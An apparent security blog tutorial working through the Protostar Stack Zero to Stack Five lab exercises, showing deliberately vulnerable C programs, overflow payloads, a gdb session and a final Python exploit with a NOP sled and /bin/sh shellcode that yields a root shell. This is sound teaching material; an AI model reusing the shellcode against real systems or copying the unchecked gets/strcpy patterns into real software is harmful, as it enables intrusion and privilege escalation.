What is a Buffer Overflow and How Hackers Exploit these Flaws part #2

6 Dec 2020

Introduction

Buffer overflows are critical vulnerabilities that allow attackers to manipulate a program’s memory and execute arbitrary code. In this article, we’ll explore the intricacies of buffer overflow attacks, understand their impact, and learn how hackers exploit these flaws.

In our previous article, we covered how RAM works and some other points essential to understanding how an operating system manages memory. We also saw, in theory, how to exploit a buffer overflow vulnerability. In this article, we move on to more concrete examples.

Memory Exploitation Practice
How to Execute our Shellcode?
- Example of Exploitation
Conclusion

Memory Exploitation Practice

To apply what we learned in the last article, we will solve together some of the Protostar exercises available on the Exploit-Education website. We are going to work through the first exercises, from Stack Zero to Stack Four.

Getting Started with Protostar

Before moving further, we are going to install Protostar on a virtual machine. Don't worry, this takes only a few minutes and is very simple. Start by going to the download section of the Exploit-Education site and getting a copy of the latest Protostar ISO. For those who don't want to waste time searching, here is the link.

Once you are done, fire up VirtualBox and follow the 9 screenshots below, step by step, to install Protostar.

First Exercise "Stack Zero"

This exercise illustrates how stack variables are arranged and demonstrates that writing outside the allocated memory can alter the execution of the program. Take the code below as the example for this first exercise:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    modified = 0;
    gets(buffer);

    if(modified != 0) {
        printf("you have changed the 'modified' variable\n");
    } else {
        printf("Try again?\n");
    }
}

As you can see, the program never lets us set the modified variable directly. So how can we change its value? First, let's see what the stack contains at this point:

[buffer (64 bytes)] [modified (4 bytes)] [saved ebp] [saved eip]

Since the gets() function does not check the size of our string, we have to ask where the characters go if we exceed 64 bytes. The answer is simple: they go into whatever comes next on the stack, so they overwrite the modified variable. We can therefore change this variable and validate the challenge with the following payload:

cd /opt/protostar/bin/
python -c "print 'A' * 65" | ./stack0
you have changed the 'modified' variable

Perfect! You just made your first exploitation of a Stack Overflow! How do you feel?
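
To make the overwrite easier to picture, here is a minimal Python 3 sketch that models the two adjacent stack variables as one byte array. It is only a simulation under the layout shown above (buffer immediately followed by modified); the name simulate_gets is hypothetical and nothing here touches the real stack0 binary.

```python
import struct

BUF_SIZE = 64  # size of buffer in stack0


def simulate_gets(user_input: bytes) -> int:
    """Copy input into a model of [buffer][modified] without a bounds check."""
    frame = bytearray(BUF_SIZE + 4)      # 64 bytes of buffer + 4 bytes of modified, all zero
    data = user_input + b"\x00"          # gets() appends a terminating NUL byte
    n = min(len(data), len(frame))       # the model ends after modified
    frame[:n] = data[:n]
    # Read modified back as a little-endian 32-bit integer
    return struct.unpack_from("<I", frame, BUF_SIZE)[0]


print(hex(simulate_gets(b"A" * 64)))  # 0x0  (only the NUL reaches modified)
print(hex(simulate_gets(b"A" * 65)))  # 0x41 (one 'A' spills into modified)
```

This is why 65 characters are enough: the 65th byte lands in the lowest byte of modified, which makes it non-zero.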

Second Exercise "Stack One"

Let's now move on to the second exercise. This example gives us a better understanding of how to modify variables in the program and how they are arranged in memory.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    if(argc == 1) {
        errx(1, "please specify an argument\n");
    }

    modified = 0;
    strcpy(buffer, argv[1]);

    if(modified == 0x61626364) {
        printf("you have correctly got the variable to the right value\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}

If we break down the above code, we can see that the program requires an argument, argv[1]. What does this mean concretely? You have almost certainly seen this many times when running a program from your terminal: in some cases, you must pass arguments on the command line, such as ./prog arg1 arg2 arg3.

In our case, argv[1] simply corresponds to arg1. The stack overflow is at the strcpy() call, because that function doesn't check the size of argv[1]. The difficulty this time is to put exactly 0x61626364 in the modified variable. To do so, we fill the buffer with 64 "A" characters of padding and then append 0x61626364. Because x86 is little-endian, the least significant byte is stored first, so the bytes are written in reverse order:

cd /opt/protostar/bin/
./stack1 $(python -c "print 'A' * 64 + '\x64\x63\x62\x61'")
you have correctly got the variable to the right value
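
The byte order can be checked without writing the bytes by hand. The following Python 3 sketch uses the standard struct module to pack the target value as a little-endian 32-bit integer; the variable names are illustrative.

```python
import struct

TARGET = 0x61626364  # value that stack1 compares modified against

le_bytes = struct.pack("<I", TARGET)   # "<I" = little-endian unsigned 32-bit
payload = b"A" * 64 + le_bytes         # 64 bytes of padding, then the value

print(le_bytes)       # b'dcba'
print(len(payload))   # 68
```

Since 0x61 to 0x64 are the ASCII codes of "a" to "d", the same argument could also be typed directly as 64 "A" characters followed by dcba.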

Third Exercise "Stack Two"

Before moving on to the explanation, please take a few minutes to analyze the code below properly.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];
    char * variable;

    variable = getenv("GREENIE");

    if(variable == NULL) {
        errx(1, "please set the GREENIE environment variable\n");
    }

    modified = 0;

    strcpy(buffer, variable);

    if(modified == 0x0d0a0d0a) {
        printf("you have correctly modified the variable\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}

This exercise is very similar to the previous one, with one nuance. If you don't know the getenv() function, take a look at its documentation: it searches the environment variable list for a variable with the given name and returns a pointer to the corresponding string value. In the above case, our program is vulnerable at this line:

strcpy (buffer, variable);

Do you know why? The program retrieves the content of the GREENIE environment variable and copies all of it into buffer without checking the size. So let's exploit this using the schema below.

GREENIE = [PADDING OF 64] [0x0d0a0d0a]

cd /opt/protostar/bin/
GREENIE=$(python -c "print 'A' * 64 + '\x0a\x0d\x0a\x0d'")
export GREENIE
echo $GREENIE
./stack2
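
One constraint is worth keeping in mind with this kind of payload: strcpy() stops copying at the first NUL byte, so the value must not contain 0x00 before its end. The Python 3 sketch below builds the GREENIE value and checks for that; build_env_value is a hypothetical helper, not part of Protostar.

```python
import struct


def build_env_value(target: int, pad_len: int = 64) -> bytes:
    """Return padding + little-endian target, refusing values strcpy() would cut short."""
    value = b"A" * pad_len + struct.pack("<I", target)
    if b"\x00" in value:
        raise ValueError("payload contains a NUL byte; strcpy() would stop there")
    return value


greenie = build_env_value(0x0d0a0d0a)
print(greenie[-4:])  # b'\n\r\n\r'
```

The target 0x0d0a0d0a contains only carriage-return and line-feed bytes, so it passes the check, while a value such as 0x00000001 would be rejected.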

Fourth Exercise "Stack Three"

Here is the code for the fourth exercise:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (* fp)();
    char buffer[64];

    fp = 0;

    gets(buffer);

    if(fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }
}

In the above code, the vulnerability is again the call to gets(). Let's examine what the stack looks like in this case:

[buffer 64][fp][saved ebp][saved eip]

Here, fp is a function pointer, and the program jumps to whatever address fp contains. All we need to do is make sure fp holds the address of win.

cd /opt/protostar/bin
objdump -d stack3 | grep "win"

Using the above command we can find that win is at address "0x08048424". So here is our final payload:

python -c "print 'A' * 64 + '\x24\x84\x04\x08'" | ./stack3
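
As a small illustration of going from the disassembly to the payload, the Python 3 sketch below parses a symbol label in the form objdump -d prints and packs the address in little-endian. The sample line is an assumption built from the address quoted above, and symbol_address is a hypothetical helper.

```python
import re
import struct

# Illustrative label line in the format printed by `objdump -d`;
# the address is the one quoted in the article.
SAMPLE_LINE = "08048424 <win>:"


def symbol_address(line: str, name: str) -> int:
    """Extract the hexadecimal address from a '<address> <name>:' label line."""
    match = re.match(r"^([0-9a-fA-F]+) <" + re.escape(name) + r">:", line)
    if match is None:
        raise ValueError("no label for " + name)
    return int(match.group(1), 16)


win = symbol_address(SAMPLE_LINE, "win")
payload = b"A" * 64 + struct.pack("<I", win)  # fill buffer, then overwrite fp
print(hex(win))        # 0x8048424
print(payload[64:])    # b'$\x84\x04\x08'
```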

Fifth Exercise "Stack Four"

In this new exercise we will see together how a buffer overflow can change code execution even when there's no variable to overwrite. First let's see the source code of our challenge:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);
}

We will now target the return address of main, that is, the saved eip. This address is stored on the stack just after the saved ebp. The main point now is to find out how far we have to write to reach it. To do so, we overflow the buffer and increase the length until we get a segmentation fault.

cd /opt/protostar/bin
(python -c "print 'A' * 64") | ./stack4
(python -c "print 'A' * 68") | ./stack4
(python -c "print 'A' * 72") | ./stack4
(python -c "print 'A' * 76") | ./stack4

We increased the length by 4 each time and got the "Segmentation fault" message with a string of 76 characters. From this, we can say that the bytes after the first 76 overwrite eip, so we need 76 "A" characters followed by the address of win in little-endian:

cd /opt/protostar/bin
objdump -x stack4 | grep "win"

Now that we have the address of win, we just need to use Python to print 76 "A" characters followed by the address in little-endian, as in the example below:

(python -c "print 'A' * 76 + '\xf4\x83\x04\x08'") | ./stack4
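
Increasing the length by hand works, but a common alternative is a cyclic pattern, in which every 4-byte window is unique, so the value found in eip after the crash gives the offset directly. The Python 3 sketch below is a simplified take on that idea, not the method used in this article; both function names are illustrative and the eip value is simulated rather than read from a debugger.

```python
import string


def pattern_create(length: int) -> bytes:
    """Build a pattern like Aa0Aa1Aa2... of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("length too large for this simple pattern")


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Return the offset at which the little-endian bytes of eip_value occur."""
    return pattern.find(eip_value.to_bytes(4, "little"))


pattern = pattern_create(100)
# Simulated crash: assume eip was loaded from bytes 76..79 of the input.
simulated_eip = int.from_bytes(pattern[76:80], "little")
print(pattern_offset(pattern, simulated_eip))  # 76
```

In practice, the pattern would be fed to the program and the eip value read from the debugger after the crash.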

How to Execute our Shellcode?

Remember that by overwriting the saved eip, we can redirect the execution flow anywhere in memory. If we want to use a Shellcode, the principle is the same, except that we redirect the flow to our Shellcode so that it gets executed. The main question is where to put the Shellcode. As we have seen previously, it can be placed on the stack or in an environment variable.

Placing a Shellcode in the buffer

[[shellcode][padding]][saved ebp][saved eip -> the address to our shellcode]

Placing a Shellcode after the saved eip

[buffer (padding)][saved ebp][saved eip -> the address of the nop][nop * large number][shellcode]

What is a nop? We covered it in our first article; if you have forgotten, I suggest you have another look at it. In short, nop stands for "No Operation": the instruction does nothing and execution simply moves on to the next instruction.

How is this useful? Execution that lands anywhere in the run of nop instructions slides through them to the Shellcode, so we no longer need the precise address of our Shellcode, just an address somewhere in the nops.
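
The effect of the nops can be sketched with a toy model in Python 3: whichever byte of the sled execution starts at, it ends up at the first byte after the sled. This only models skipping over 0x90 bytes, it does not emulate a CPU, and the 0xCC bytes are a placeholder standing in for a real Shellcode.

```python
NOP = 0x90


def landing_offset(memory: bytes, start: int) -> int:
    """Skip consecutive nop bytes from start and return the offset reached."""
    pos = start
    while pos < len(memory) and memory[pos] == NOP:
        pos += 1
    return pos


sled = bytes([NOP]) * 20
shellcode = b"\xcc" * 4          # placeholder bytes, not a real Shellcode
memory = sled + shellcode

# Try every possible entry point inside the sled.
landings = {landing_offset(memory, start) for start in range(len(sled))}
print(landings)  # {20}
```

Every entry point gives the same landing offset, which is why a longer sled tolerates a less precise return address.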

Example of Exploitation

It's now time to move on to the practical side of exploitation. To do this, we will use the "stack5" challenge from the Exploit-Education website, which contains several exercises on binary exploitation. Here is the code that we will use:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);
}

How and where to Get Started?

In the above source code, a 64-byte buffer is created and the gets() function is called. What we must do is overflow the buffer and overwrite the return address so that it points to our Shellcode. Supposing we do not have the source code, we are going to disassemble main using gdb. Among other things, this will let us find the address of the buffer where our input is stored.

cd /opt/protostar/bin
gdb -q stack5
Reading symbols from /opt/protostar/bin/stack5...done.
(gdb) disas main

Now we are going to put a breakpoint into the main() function to stop the execution of the program and examine what is on the stack.

(gdb) b * 0x080483da
Breakpoint 1 at 0x80483da: file stack5/stack5.c, line 11.

With r (run) and i r (info registers), we can run the program and get a complete overview of the registers. So let's run it and check what we get. The eax register holds the address of the string we entered, "ABCDEF", so the beginning of the buffer is 0xbffffc70.

(gdb) x/s 0xbffffc70
0xbffffc70:     "ABCDEF"

Since the stack pointer register esp points to 0xbffffcbc, we can calculate the length of our padding using the following command:

(gdb) p/d 0xbffffcbc - 0xbffffc70
$1 = 76

We can determine that our padding length is 76, which is what we need to overwrite the return address. To check this, open a new terminal and run the following Python command to generate the complete string:

python -c "print 'A' * 76 + 'B' * 4"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Copy the complete string to your clipboard, go back to the terminal where your gdb instance is running, and paste the string after executing the r command, as follows:

(gdb) r
Starting program: /opt/protostar/bin/stack5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x41414149
) at stack5/stack5.c:11
11      stack5/stack5.c: No such file or directory.
        in stack5/stack5.c

Once you are done, execute the following command to check that the value at the address esp points to has been overwritten:

(gdb) x/s 0xbffffcbc
0xbffffcbc:      "BBBB"

As you can see, the content of 0xbffffcbc is now "BBBB", so we control the return address. The return address should be 0xbffffcbc + 4, which equals 0xbffffcc0, the address just after the saved eip, where the rest of our payload will land. If you want to be sure that this address is present on the stack, execute the following command in the terminal running your gdb instance:

(gdb) x/60wx $eax
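
The two calculations from the gdb session can be reproduced in a few lines of Python 3. The addresses are the ones observed above; they are specific to this session and may differ on another setup or outside gdb, so treat them as assumptions.

```python
import struct

BUFFER_START = 0xbffffc70   # start of buffer, read from eax in the gdb session
RET_SLOT = 0xbffffcbc       # address esp points to, where the saved eip lives

offset = RET_SLOT - BUFFER_START   # bytes of padding before the return address
after_ret = RET_SLOT + 4           # first address after the 4-byte saved eip

print(offset)                         # 76
print(hex(after_ret))                 # 0xbffffcc0
print(struct.pack("<I", after_ret))   # b'\xc0\xfc\xff\xbf'
```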

Now we are going to create an exploit to verify that we can execute arbitrary code. For this, we will use the int3 instruction (opcode 0xCC), a software breakpoint that stops the execution of the program.

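cat > /tmp/exploit.py << 'EOL'
import struct

def m32(addr):
    # Pack a 32-bit address as little-endian bytes
    return struct.pack("<I", addr)

padding = "A" * 76        # filler up to the saved eip
ret = m32(0xbffffcc0)     # address just after the saved eip
nops = "\x90" * 20        # NOP sled
shellcode = "\xCC" * 4    # int3 breakpoints
print padding + ret + nops + shellcode
EOL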

python /tmp/exploit.py > /tmp/file
cd /opt/protostar/bin/
./stack5 < /tmp/file

We see that it works, so now we are going to try to get a /bin/sh shell as root. We can generate the Shellcode using msfvenom or search the Shell Storm website for one that works in our situation. To make it easier for you, I have already selected a Shellcode that fits this situation, which can be found here. Putting all of this together, our final payload will be:

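import struct

def m32(addr):
    # Pack a 32-bit address as little-endian bytes
    return struct.pack("<I", addr)

padding = "A" * 76        # filler up to the saved eip
ret = m32(0xbffffcc0)     # address just after the saved eip
nops = "\x90" * 20        # NOP sled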
shellcode = ""
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89"
shellcode += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
shellcode += "\xcd\x80\x31\xc0\x40\xcd\x80"

print padding+ret+nops+shellcode

The final step is to save the above code in a file, which I will name "exploit.py", and execute it using the command below. The trailing cat keeps standard input open so that we can type commands into the spawned shell:

(python /tmp/exploit.py;cat) | ./stack5

We can now execute commands as root on the system. As I said before, these challenges are an introduction. Nowadays, binaries have protections such as NX on Linux or DEP on Windows, which make some memory areas (usually the stack) non-executable. However, understanding these principles is a good start if you want to dig deeper into buffer overflows.
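
The scripts above use Python 2 syntax, which is what the Protostar machine provides. If you build the payload on a host with Python 3, note that printing a str such as "\x90" would encode it as UTF-8 (two bytes, 0xC2 0x90) and corrupt the payload, so the data has to be handled as bytes. Here is a minimal sketch of that variant; build_payload and write_payload are hypothetical names, the defaults are the values found in the gdb session, and the 0xCC bytes are the breakpoint placeholder used earlier.

```python
import struct


def build_payload(shellcode: bytes, ret_addr: int = 0xbffffcc0,
                  pad_len: int = 76, nop_count: int = 20) -> bytes:
    """Assemble padding + return address + NOP sled + shellcode as raw bytes."""
    padding = b"A" * pad_len
    ret = struct.pack("<I", ret_addr)    # little-endian 32-bit address
    nops = b"\x90" * nop_count
    return padding + ret + nops + shellcode + b"\n"   # newline ends the gets() input


def write_payload(path: str, payload: bytes) -> None:
    """Write the payload in binary mode so no text encoding is applied."""
    with open(path, "wb") as handle:
        handle.write(payload)


payload = build_payload(b"\xcc" * 4)   # int3 placeholder instead of a real Shellcode
print(len(payload))  # 105
```

Calling write_payload("/tmp/file", payload) would produce a file that can be fed to the program with ./stack5 < /tmp/file, as in the test run above.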

Conclusion

In conclusion, mastering buffer overflow exploitation is essential for both offensive and defensive security professionals. By understanding the underlying mechanisms and techniques, we can better protect systems and applications from potential threats.

For more information about this tutorial and to see a live demonstration of this type of attack, I encourage you to watch the video below.